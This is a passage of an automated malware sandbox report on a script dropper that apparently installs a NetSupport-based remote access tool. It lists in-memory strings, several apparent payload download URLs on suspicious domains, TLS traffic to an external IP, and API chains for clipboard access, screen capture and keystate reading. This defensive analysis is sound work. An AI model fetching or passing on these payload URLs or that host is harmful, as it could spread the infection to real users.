                                Source: client32.exeString found in binary or memory: http://%s/testpage.htm
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exeString found in binary or memory: http://127.0.0.1
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://autoscaling.amazonaws.com/doc/2011-01-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aws.amazon.com/apache2.0/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudformation.amazonaws.com/doc/2010-05-15/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.am(Y
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazon(Y
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaw(Y
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws(Y
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws.com/doc/2016-11-25/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws.com/doc/2017-03-25/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws.com/doc/2017-10-30/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws.com/doc/2018-06-18/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws.com/doc/2018-11-05/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws.com/doc/2019-03-26/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloudfront.amazonaws.com/doc/2020-05-31/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.amazonwebservices.com/general/latest/gr/rande.html
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/PrivateContent.html
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DataModel.html#DataModel.DataTypes).
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DataModel.html)
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/uuid.html
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ec2.amazonaws.com/doc/2016-11-15
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elasticache.amazonaws.com/doc/2015-02-02/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elasticbeanstalk.amazonaws.com/docs/2010-12-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elasticloadbalancing.amazonaws.com/doc/2012-06-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elasticloadbalancing.amazonaws.com/doc/2015-12-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feross.org
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com
                                Source: client32.exeString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jsperf.com/call-apply-segu
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://monitoring.amazonaws.com/doc/2010-08-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pajhome.org.uk/crypt/md5
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rds.amazonaws.com/doc/2013-01-10/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rds.amazonaws.com/doc/2013-02-12/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rds.amazonaws.com/doc/2013-09-09/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rds.amazonaws.com/doc/2014-09-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rds.amazonaws.com/doc/2014-10-31/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://redshift.amazonaws.com/doc/2012-12-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ses.amazonaws.com/doc/2010-12-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sns.amazonaws.com/doc/2010-03-31/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/22747272/680742
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC402B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721435455.000001AC3F69A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc3492#section-3.4
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.movable-type.co.uk/scripts/sha1.html
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.co/7PzMCcy
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blueimp.net
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=695438.
                                Source: wscript.exe, 00000000.00000003.1995143786.000001AC3DF7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1995375657.000001AC3DF84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1995375657.000001AC3DFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://businessinsanjose.info/work/yyy.zip?8982
                                Source: wscript.exe, 00000000.00000003.1995143786.000001AC3DFB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://depostsolo.biz/
                                Source: wscript.exe, 00000000.00000003.1995217685.000001AC3DCFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://depostsolo.biz/work/download.php?id=100&76794
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatio
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ec2.ap-southeast-1.amazonaws.com
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC402B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721435455.000001AC3F69A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/LiosK/UUID.js
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aws/aws-sdk-js/issues/2304)
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/beatgammit/base64-js/issues/42
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/blueimp/JavaScript-MD5
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/buffer/pull/97
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-lru-cache
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/1707
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
                                Source: wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iam.amazonaws.com/doc/2010-05-08/
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mths.be/punycode
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/latest/docs/api/stream.html#stream_object_mode
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/MIT
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://route53.amazonaws.com/doc/2(Y
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://route53.amazonaws.com/doc/2013-04-01/
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdk.amazonaws.com/js/BUNDLE_LICENSE.t(Y
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdk.amazonaws.com/js/BUNDLE_LICENSE.txt
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sim.amazon.com/issues/ATHENA-39828
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sts.amazonaws.com/doc/2011-06-15/
                                Source: wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc1123#section-2
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                Source: unknownHTTPS traffic detected: 98.142.240.215:443 -> 192.168.2.4:49731 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 98.142.240.215:443 -> 192.168.2.4:49738 version: TLS 1.2
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,4_2_110335A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110335A0 GetClipboardFormatNameA,SetClipboardData,5_2_110335A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101FC20
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,4_2_11033320
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1105D5C0 timeGetTime,GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CloseDesktop,GetCurrentThreadId,wsprintfA,CreateFileMappingA,MapViewOfFile,CloseHandle,CreateDIBSection,SelectObject,BitBlt,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,StretchBlt,GetLastError,GetDIBits,_free,GetDIBits,timeGetTime,SelectObject,DeleteObject,DeleteObject,DeleteDC,DeleteDC,ReleaseDC,SelectObject,DeleteObject,DeleteDC,timeGetTime,timeGetTime,_free,_free,UnmapViewOfFile,CloseHandle,4_2_1105D5C0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11114590
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,5_2_11114590
                                Source: Yara matchFile source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000002.2183914163.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2265885595.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\4dvs23l\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111165C0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,5_2_111165C0

                                System Summary

                                barindex
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeProcess Stats: CPU usage > 49%
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11113190: GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1115EA00 FindWindowA,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,4_2_1115EA00
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D900
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D900
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110736804_2_11073680
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11029BB04_2_11029BB0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110627B04_2_110627B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1111C9904_2_1111C990
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1108B2A04_2_1108B2A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110336D04_2_110336D0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110518004_2_11051800
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1115F8404_2_1115F840
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1101BCD04_2_1101BCD0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11087F504_2_11087F50
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11045E704_2_11045E70
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1101C1104_2_1101C110
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_111640E04_2_111640E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_111683454_2_11168345
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110807404_2_11080740
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1100892B4_2_1100892B
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1105C8A04_2_1105C8A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11116F304_2_11116F30
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1101CF304_2_1101CF30
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_6C60A9804_2_6C60A980
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_6C633DB84_2_6C633DB8
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110627B05_2_110627B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110736805_2_11073680
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110336D05_2_110336D0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110518005_2_11051800
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1115F8405_2_1115F840
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11029BB05_2_11029BB0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1101BCD05_2_1101BCD0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11087F505_2_11087F50
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11045E705_2_11045E70
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1101C1105_2_1101C110
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111640E05_2_111640E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111683455_2_11168345
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111265B05_2_111265B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110704305_2_11070430
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110807405_2_11080740
